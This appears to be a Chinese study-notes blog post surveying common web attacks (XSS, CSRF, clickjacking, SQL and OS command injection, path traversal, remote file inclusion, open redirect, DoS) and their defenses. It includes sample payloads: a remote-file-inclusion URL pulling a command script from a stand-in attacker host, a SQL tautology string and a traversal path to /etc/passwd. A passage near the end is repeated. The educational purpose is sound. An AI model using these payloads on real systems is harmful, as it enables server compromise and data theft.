Web攻击分类

简单的HTTP协议本身并不存在安全性问题，因此协议本身几乎不会成为攻击的对象。应用HTTP协议的服务器和客户端，以及运行在服务器上的Web应用等资源才是攻击目标。

web应用的攻击模式有以下两种

• 主动攻击(主要攻击服务器上的资源)
  • SQL注入攻击
  • OS命令注入攻击
  • 其他
• 被动攻击(主要攻击用户的资源和权限)
  • 跨站脚本攻击
  • 跨站点请求伪造
  • 点击劫持（与跨站请求伪造手法相似）
  • HTTP首部注入攻击
  • 其他

跨站脚本攻击（XSS）

跨站脚本攻击（XSS）是指通过存在安全漏洞的Web网站注册用户的浏览器内运行非法的HTML标签或JavaScript进行的一种攻击。动态创建的HTML部分有可能隐藏着安全漏洞。就这样，攻击者编写脚本设下陷阱，用户在自己的浏览器上运行时，一不小心就会受到被动攻击。目的：利用网站漏洞从用户那里恶意盗取信息。

XSS攻击，通常指黑客通过“HTML注入”篡改了网页，插入了恶意的脚本，从而在用户浏览网页时，控制用户浏览器的一种攻击。在一开始，这种攻击的演示案例是跨域的，所以叫做“跨站脚本”。但是发展到今天，由于JavaScript的强大功能以及网站前端应用的复杂化，是否跨域已经不再重要。但是由于历史原因，XSS这个名字却一直保留下来。

XSS分类

• 反射型XSS（非持久型XSS）
• DOM型XSS（非持久性XSS）
• 存储型XSS（持久性XSS攻击）

反射型XSS

• 攻击构造出特殊的 URL ，其中包含恶意代码。（这个恶意代码诸如第三方的JS或document.cookie等）
• 用户被诱导打开带有恶意代码的 URL，服务器端将恶意代码从 URL 中取出当做参数处理，然后返回给用户带有恶意代码的数据。
• 用户浏览器接收到响应解析执行，混在其中的恶意代码也被执行。
• 恶意代码窃取用户敏感数据发送给攻击者，或者冒充用户的行为，调用目标网站接口执行攻击者指定的操作。

DOM型XSS

从效果上来说也是反射型XSS，单独划分出来，是因为DOM Based XSS的形成原因比较特别，发现它的安全专家专门提出了这种类型的XSS。出于历史原因，也就把它单独作为一个分类了。

• 攻击者构造出特殊的 URL，其中包含恶意代码。
• 用户被诱导打开带有恶意代码的 URL。
• 用户浏览器接收到响应后解析执行，前端 JavaScript 取出 URL 中的恶意代码并执行。
• 恶意代码窃取用户数据并发送到攻击者的网站，或者冒充用户的行为，调用目标网站接口执行攻击者指定的操作。

存储型XSS

存储型 XSS 跟 反射型 XSS 的区别是：存储型 XSS 的恶意代码存在服务器上，反射型 XSS 的恶意代码存在 URL 里。它是最危险的一种跨站脚本。比反射性 XSS 和 DOM 型 XSS 都更有隐蔽性，因为它不需要用户手动触发。任何允许用户存储数据的 Web 程序都可能存在存储型 XSS 漏洞。若某个页面遭受存储型 XSS 攻击，所有访问该页面的用户都会被 XSS 攻击。

• 攻击者把恶意代码提交到目标网站的服务器中。
• 用户打开目标网站，网站服务器端把带有恶意代码的数据取出，当做正常数据返回给用户。
• 用户浏览器接收到响应解析执行，混在其中的恶意代码也被执行。
• 恶意代码窃取用户敏感数据发送给攻击者，或者冒充用户的行为，调用目标网站接口执行攻击者指定的操作。

防御方法

• 浏览器自带防御（X-XSS-Protection）
  HTTP X-XSS-Protection 响应头是 Internet Explorer，Chrome 和 Safari 的一个功能，当检测到跨站脚本攻击(XSS)时，浏览器将停止加载页面。其原理是检查 URL 和 DOM 中元素的相关性，但这并不能完全防止反射型 XSS，而且也并不是所有浏览器都支持 X-XSS-Protection。

X-XSS-Protection: 0     
禁止XSS过滤。     X-XSS-Protection: 1       
启用XSS过滤（通常浏览器是默认的）。 如果检测到跨站脚本攻击，浏览器将清除页面（删除不安全的部分）。  X-XSS-Protection: 1; mode=block  
启用XSS过滤。 如果检测到攻击，浏览器将不会清除页面，而是阻止页面加载。  X-XSS-Protection: 1; report=<reporting-uri>    
启用XSS过滤。 如果检测到跨站脚本攻击，浏览器将清除页面并使用CSP report-uri指令的功能发送违规报告。  

• 转义
  XSS攻击主要是通过构造特殊字符来注入脚本。所以在客户端与服务端都进行输入检测，然后对用户输入的数据进行转义。

function escapeHTML(str) {if (!str) return '';str = str.replace(/&/g, "&amp;");str = str.replace(/</g, "&lt;");str = str.replace(/>/g, "&gt;");str = str.replace(/"/g, "&quot;");str = str.replace(/'/g, "&#39;");return str;
};

• 过滤
  在富文本中因为需要保留 HTML ，所以我们不能使用转义的方法防御 XSS 攻击，这里使用过滤的方式防御 XSS 攻击，也就是通过只使用白名单允许的 HTML 标记及其属性，来防御攻击。

• 内容安全策略（csp）
  实质是白名单策略，开发者明确告诉客户端，哪些外部资源可以加载和执行，大大增强了网页的安全性。

跨站请求伪造（CSRF）

叫做“攻击者伪造请求”，更好理解。

• 用户登录一些官方网站。
• 攻击者伪造一个链接或事件，诱导用户去点击。
• 用户触发事件后（点击或者触发其他什么事件），执行操作。用户执行了表面的操作，实际上攻击者利用用户触发这个事件，伪造用户在官方网站做一些事情。

例子

• 张三登录了购物网站。
• 之后张三不小心点击了攻击者的恶意链接。
• 在点击链接之后，张三的购物车被清空。此时，张三还并不知情。

分析攻击者为什么能成功

• 张三如果第一次登录购物网站，网站要求用户输入用户名和命名，验证正确才能进入。
• 此时购物网站在张三登录成功之后，会给张三Cookie（里面有Session ID），下次张三登录的时候可以不必输入用户名密码，靠着Session ID 就可以直接进入。
• 若张三点击了攻击者的事件之后，其实就是伪造用户去进入购物网站然后执行一些操作。（利用张三的权限去做事情）
• 此时购物网站的服务器会认为是张三本人在做的一些操作，因为有Session ID。

CSRF特点

• 攻击一般发起在第三方网站，而不是被攻击的网站。
• 攻击是利用受害者在被攻击网站的登录凭证，冒充受害者提交操作，仅仅是“冒用”，而不是直接窃取数据。
• 攻击者预测出被攻击的网站接口的所有参数，成功伪造请求。

防御方法

• SameSite 属性
  Cookie 的 SameSite 属性用来限制第三方 Cookie，从而减少安全风险，可以用来防止 CSRF 攻击和用户追踪。

• 同源检测
  在 HTTP 协议中，每一个异步请求都会携带两个 Header ，用于标记来源域名：

  • Origin Header
  • Referer Header

这两个 Header 在浏览器发起请求时，大多数情况会自动带上，并且不能由前端自定义内容。 服务器可以通过解析这两个 Header 中的域名，确定请求的来源域。

通过校验请求的该字段，我们能知道请求是否是从本站发出的。我们可以通过拒绝非本站发出的请求，来避免了 CSRF 攻击。

点击劫持

点击劫持是一种视觉上的欺骗手段。攻击者使用一个透明的、不可见的iframe，覆盖在一个网页上，然后诱使用户在该网页上进行操作，此时用户将在不知情的情况下点击透明的iframe页面。通过调整iframe页面的位置，可以诱使用户恰好点击在iframe页面的一些功能性按钮上。

原理很简单：

• 通过z-index属性让其位于最上层。
• 通过opacity属性让其透明度为0。

点击劫持攻击与CSRF攻击（详见“跨站点请求伪造”一章）有异曲同工之妙，都是在用户不知情的情况下诱使用户完成一些动作。但是在CSRF攻击的过程中，如果出现用户交互的页面，则攻击可能会无法顺利完成。与之相反的是，点击劫持没有这个顾虑，它利用的就是与用户产生交互的页面。

Flash点击劫持

案例：

• 攻击者制作了一个Flash游戏，并诱使用户来玩这个游戏。这个游戏就是让用户去点击“CLICK”按钮，每次点击后这个按钮的位置都会发生变化。
• 在其上隐藏了一个看不见的iframe。
• 攻击通过诱导用户鼠标点击的位置，能够完成一些较为复杂的流程。
• 最终通过这一步步的操作，打开了用户的摄像头。

其他的点击劫持

• 图片覆盖攻击
• 拖拽劫持
• 触屏劫持（发生在智能手机上的攻击）

HTTP首部注入攻击

HTTP首部注入攻击（HTTP Header Injection）是指攻击者通过在响应首部字段内插入换行，添加任意响应首部或主体的一种攻击。属于被动攻击模式。

向首部主体内添加内容的攻击称为HTTP响应截断攻击（HTTP Response Splitting Attack）。

如下所示，Web应用有时会把从外部接收到的数值，赋给响应首部字段Location和Set-Cookie。

Loaction: http://www.example.com/a.cgi?q=12345  
Set-Cookie: UID=12345

危害

• 设置任何Cookie信息
• 重定向至任意URL
• 显示任意的主体（HTTP响应截断攻击）

SQL注入攻击

注入攻击的本质，是把用户输入的数据当做代码执行。这里有两个关键条件，第一个是用户能够控制输入；第二个是原本程序要执行的代码，拼接了用户输入的数据。

所谓SQL注入，就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。

SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句进而执行攻击者所要的操作，其主要原因是程序没有细致地过滤用户输入的数据，致使非法数据侵入系统。

比如先前的很多影视网站泄露VIP会员密码大多就是通过WEB表单递交查询字符暴出的，这类表单特别容易受到SQL注入式攻击．

如何防御SQL注入攻击

• 使用预编译语句，绑定变量。（最佳方式）

使用预编译的SQL语句，SQL语句的语义不会发生改变。在SQL语句中，变量用？表示，攻击者无法改变SQL的结构，在上面的例子中，即使攻击者插入类似于tom' or'1'='1的字符串，也只会将此字符串当做username来查询。

• 使用安全的存储过程对抗SQL注入。

使用存储过程的效果和使用预编语句译类似，其区别就是存储过程需要先将SQL语句定义在数据库中。但需要注意的是，存储过程中也可能会存在注入问题，因此应该尽量避免在存储过程内使用动态的SQL语句。如果无法避免，则应该使用严格的输入过滤或者是编码函数来处理用户的输入数据。

• 检查数据类型

检查输入数据的数据类型，在很大程度上可以对抗SQL注入。比如用户在输入邮箱时，必须严格按照邮箱的格式；输入时间、日期时，必须严格按照时间、日期的格式，等等，都能避免用户数据造成破坏。但数据类型检查并非万能，如果需求就是需要用户提交字符串，比如一段短文，则需要依赖其他的方法防范SQL注入。

• 使用安全函数
• 使用最小权限原则，避免Web应用直接使用root、dbowner等高权限账户直接连接数据库。
  如果有多个不同的应用在使用同一个数据库，则也应该为每个应用分配不同的账户。Web应用使用的数据库账户，不应该有创建自定义函数、操作本地文件的权限。

OS命令注入攻击

OS命令注入攻击（OS Command Injection）是指通过Web应用，执行非法的操作系统命令达到攻击的目的。只要在能调用Shell函数的地方就有存在被攻击的风险。

OS命令注入攻击可以向Shell发送命令，让Windows或Linux操作系统的命令行启动程序。也就是说，通过OS注入攻击可执行OS上安装着的各种程序。

产生的原因

• 使用了内部调用Shell的函数（system、open等）
• 将倍加传入的参数传递给内部调用的shell的函数
• 参数中shell的元字符没有被转义

防御对策

• 选择不调用OS命令的实现方法。不调用利用shell的功能，既能杜绝了OS命令注入漏洞混入的可能性，又消除了调用OS命令的而系统开销，能够从多方面提高应用的性能。
• 不将外界输入的字符串传递给命令行参数。
• 使用安全的函数对传递给OS命令参数进行转义。

其他一些Web攻击

目录遍历攻击

目录遍历（Directory Traversal）攻击是指对本无意公开的文件目录，通过非法截断其目录路径后，达成访问目的的一种攻击。这种攻击有时也称为路径遍历（PathTraversal）攻击。

通过Web应用对文件处理操作时，在由外部指定文件名的处理存在疏漏的情况下，用户可使用．…/等相对路径定位到/etc/passed等绝对路径上，因此服务器上任意的文件或文件目录皆有可能被访问到。这样一来，就有可能非法浏览、篡改或删除Web服务器上的文件。

固然存在输出值转义的问题，但更应该关闭指定对任意文件名的访问权限。

远程文件包含漏洞

远程文件包含漏洞（Remote File Inclusion）是指当部分脚本内容需要从其他文件读入时，攻击者利用指定外部服务器的URL充当依赖文件，让脚本读取之后，就可运行任意脚本的一种攻击。

这主要是PHP存在的安全漏洞，对PHP的include或require来说，这是一种可通过设定，指定外部服务器的URL作为文件名的功能。但是，该功能太危险，PHP5.2.0之后默认设定此功能无效。

固然存在输出值转义的问题，但更应控制对任意文件名的指定。

源代码：
http://example.com/foo.php?mod=news.php经过攻击后：
http://example.com/foo.php?mod=http://hackr.jp/cmd.php&cmd=1s

攻击者通过把要引入的文件替换成自己的文件，就能攻击到服务器了。

不正确的错误消息处理

不正确的错误消息处理（Error Handling Vulnerability）的安全漏洞是指，Web应用的错误信息内包含对攻击者有用的信息。与Web应用有关的主要错误信息如下所示。

• Web应用抛出的错误消息
• 数据库等系统抛出的错误消息

Web应用不必在用户的浏览画面上展现详细的错误消息。对攻击者来说，详细的错误消息有可能给他们下一次攻击以提示。

开放重定向

开放重定向（Open Redirect）是一种对指定的任意URL作重定向跳转的功能。而与此功能相关联的安全漏洞是指，假如指定的重定向URL到某个具有恶意的Web网站，那么用户就会被诱导至那个Web网站。

原URL：
http://example.com/?redirect=http://www.tricorder.jp被攻击后：
http://example.com/?redirect=http://hackr.jp

用户看到URL后原以为访问example.com，不料实际上被诱导至hackr.jp这个指定的重定向目标。

可信度高的Web网站如果开放重定向功能，则很有可能被攻击者选中并用来作为钓鱼攻击的跳板。

密码破解

密码破解攻击（Password Cracking）即算出密码，突破认证。攻击不仅限于Web应用，还包括其他的系统（如FTP或SSH等）。有以下几种破解方法：

• 穷举法
  对所有密钥集合构成的密钥空间（Keyspace）进行穷举。即，用所有可行的候选密码对目标的密码系统试错，用以突破验证的一种攻击。
• 字典攻击
  利用事先收集好的候选密码（经过各种组合方式后存入字典），枚举字典中的密码，尝试通过认证的一种攻击手法。

字典攻击中有一种利用其他Web网站已泄露的ID及密码列表进行的攻击。很多用户习惯随意地在多个Web网站使用同一套ID及密码，因此攻击会有相当高的成功几率

DoS攻击

DoS攻击（Denial of Service attack）是一种让运行中的服务呈停止状态的攻击。有时也叫做服务停止攻击或拒绝服务攻击。DoS攻击的对象不仅限于Web网站，还包括网络设备及服务器等。

有两种DOS攻击方式：

• 集中利用访问请求造成资源过载，资源用尽的同时，实际上服务也就呈停止状态。（海量请求导致服务器瘫痪,服务器很难分辨何为正常请求，何为攻击请求，因此很难防止DoS攻击。）
• 通过攻击安全漏洞使服务停止。

多台计算机发起的DoS攻击称为DDoS攻击（DistributedDenial of Service attack）。DDoS攻击通常利用那些感染病毒的计算机作为攻击者的攻击跳板。

后门程序

后门程序（Backdoor）是指开发设置的隐藏入口，可不按正常步骤使用受限功能。利用后门程序就能够使用原本受限制的功能。

通常的后门程序分为以下3种类型。

• 开发阶段作为Debug调用的后门程序
• 开发者为了自身利益植入的后门程序
• 攻击者通过某种方法设置的后门程序

可通过监视进程和通信的状态发现被植入的后门程序。但设定在Web应用中的后门程序，由于和正常使用时区别不大，通常很难发现。

参考文献

• 《图解HTTP》
• 吴瀚清《白帽子讲Web安全》
• 跨站脚本攻击—XSS
• 跨站请求伪造—CSRF

结语

开发者为了自身利益植入的后门程序

• 攻击者通过某种方法设置的后门程序

可通过监视进程和通信的状态发现被植入的后门程序。但设定在Web应用中的后门程序，由于和正常使用时区别不大，通常很难发现。

参考文献

• 《图解HTTP》
• 吴瀚清《白帽子讲Web安全》
• 跨站脚本攻击—XSS
• 跨站请求伪造—CSRF

结语

我的计算机网络学习之旅暂时就结束了。因为大四还在实习，白天还需要完成公司的任务，只能在晚上或者周末去公司自主学习，前前后后大约有花一两个月的时间。收获很多，这种感觉与当初上计算机网络课的感觉完全不一样，当时上了也就上了，知识都是零零散散的，都没有去串联起来，导致记得不深刻。如今花了心思去整理总结后，有种融会贯通的感觉，在Chrome调试，项目中前后端对接，性能优化方面的认知更为巩固和深刻。